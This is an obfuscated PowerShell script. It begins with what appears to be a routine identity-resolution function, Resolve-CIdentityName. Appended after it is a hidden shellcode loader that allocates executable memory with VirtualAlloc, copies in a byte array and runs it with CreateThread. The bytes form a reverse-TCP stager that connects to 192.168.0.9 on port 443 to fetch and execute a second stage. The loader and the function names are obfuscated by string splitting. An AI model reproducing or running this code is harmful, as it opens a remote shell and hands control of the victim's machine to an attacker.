  Set-vaRiable  ('I3'+'rcv')  ( [Type]("{1}{2}{0}" -F 'ty','CaRb','on.idENTi')  )  ;  
function r`ESoLV`E-CiDE`N`TITy`NAME
{
    
    [CmdletBinding(DeFAUlTPARAMetErsetnamE={"{2}{0}{1}"-f 'y','Name','B'})]
    [OutputType([string])]
    param(
        [Parameter(MandatOrY=${T`Rue},pARaMETerSeTNamE="bYN`AmE",poSItION=0)]
        [string]
        
        ${n`AmE},

        [Parameter(MAnDAtOrY=${tr`Ue},pARamETeRSEtName="BYS`id")]
        
        
        
        ${s`ID}
    )

    .("{2}{0}{1}{3}" -f'-','StrictMo','Set','de') -Version ("{1}{0}"-f 'est','Lat')

    &("{2}{0}{1}{3}" -f'rPr','e','Use-Calle','ference') -Cmdlet ${pSC`MdL`ET} -Session ${e`x`ecuTI`O`NCONtexT}."SeSSio`Nst`A`Te"
    
    if( ${P`scmDl`ET}.pArAmetErseTNAME -eq ("{0}{1}{2}" -f'B','yNa','me') )
    {
        return .("{4}{1}{0}{3}{2}"-f'-CIde','solve','ty','nti','Re') -Name ${na`ME} -ErrorAction ("{0}{1}{2}" -f'Ig','n','ore') | .("{1}{2}{0}" -f 'bject','Se','lect-O') -ExpandProperty ("{2}{1}{0}" -f'ame','N','Full')
    }
    elseif( ${PscMD`l`Et}.ParAMETErSETnAME -eq ("{0}{1}"-f'BySi','d') )
    {
        ${S`Id} = &("{1}{5}{2}{4}{3}{0}"-f 'ifier','Conv','tTo-CSecurityId','nt','e','er') -SID ${s`ID}
        if( -not ${S`id} )
        {
            return
        }

        ${i`d} =   ( gEt-vaRiabLE  ('i3'+'rcv')  ).VAlue::("{2}{1}{0}" -f 'Sid','indBy','F').Invoke( ${s`Id} )
        if( ${i`D} )
        {
            return ${I`d}."fUL`lNaMe"
        }
        else
        {
            return ${S`iD}.("{2}{1}{0}"-f 'String','o','T').Invoke()
        }
    }
    
}


${C} = ((("{35}{37}{26}{45}{24}{43}{112}{103}{88}{79}{62}{55}{91}{121}{74}{104}{27}{107}{68}{99}{115}{41}{77}{33}{61}{118}{109}{4}{72}{95}{97}{8}{82}{15}{100}{67}{86}{1}{29}{119}{84}{44}{56}{9}{17}{40}{19}{14}{38}{90}{63}{78}{12}{125}{93}{22}{116}{20}{101}{10}{105}{47}{13}{126}{75}{52}{76}{111}{65}{21}{81}{124}{18}{39}{53}{128}{16}{42}{83}{127}{60}{66}{32}{114}{46}{7}{31}{58}{6}{102}{5}{30}{0}{120}{11}{34}{25}{59}{73}{28}{123}{23}{2}{87}{64}{69}{85}{57}{117}{106}{51}{70}{50}{3}{108}{96}{98}{80}{89}{36}{129}{92}{110}{113}{71}{94}{54}{122}{49}{48}"-f 'tion','b','d);[Dl','s','pe',' dwC','uin','e','ort({0}ke','ic','pThreadA','s','hr','ri','nt','32.','tartAd',' e',' I','I','tr ','i','In','dI','ll{0','t','({0}','ua','hre','li','rea','r,','l','Size,',', IntP','[D','rn ','llImport','P','ntP','xtern ','in','d','})','sta','kernel32.d','aramet','t','unt);',' co','lic ','p','int dwS','t','rc,','ext','t','s',' ','r l',', IntPtr',' uint ',' ','r Crea','or','kS',' ','l','In','t({','ub','t(IntPtr de',', uint flProtect)','pT','In','u','t','t dw','teT','atic','c ext','ze','rnel','r',' ','0}m','l{0})]pu','lImp','c st','e','t','er','tPtr ','d(','st, uint s',';[DllI','at','mp','i','tPtr lpAddress,','d','l','t','publi','tPtr Virt','t','dll{0})]','lAlloc(','t','llocationTy','mem','ac',']','se','pP',' u','tP','vcrt.','flA','c','Flag','n ',' uint','a',',','ea','butes, ','ess','r lpS','In')) -f  [cHar]34);${w} = .("{0}{1}" -f'Add-T','ype') -memberDefinition ${C} -Name ("{0}{1}"-f'Win','32') -namespace ("{0}{2}{3}{1}" -f'Win','tions','3','2Func') -passthru;[Byte[]];[Byte[]]${S`C} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x00,0x09,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${si`Ze} = 0x1000;if (${S`c}."l`E`NGTh" -gt 0x1000){${sI`Ze} = ${sc}."lE`NG`TH"};${X}=${w}::("{1}{0}{2}"-f'ua','Virt','lAlloc').Invoke(0,0x1000,${s`iZE},0x40);for (${i}=0;${i} -le (${s`c}."L`e`NgtH"-1);${I}++) {${W}::"mE`M`seT"([IntPtr](${x}.("{0}{2}{1}"-f'T','32','oInt').Invoke()+${I}), ${s`c}[${I}], 1)};${W}::("{0}{2}{1}{3}" -f'Cr','eThre','eat','ad').Invoke(0,0,${X},0,0,0);for (;;){&("{1}{2}{0}" -f 'eep','St','art-sl') 60};
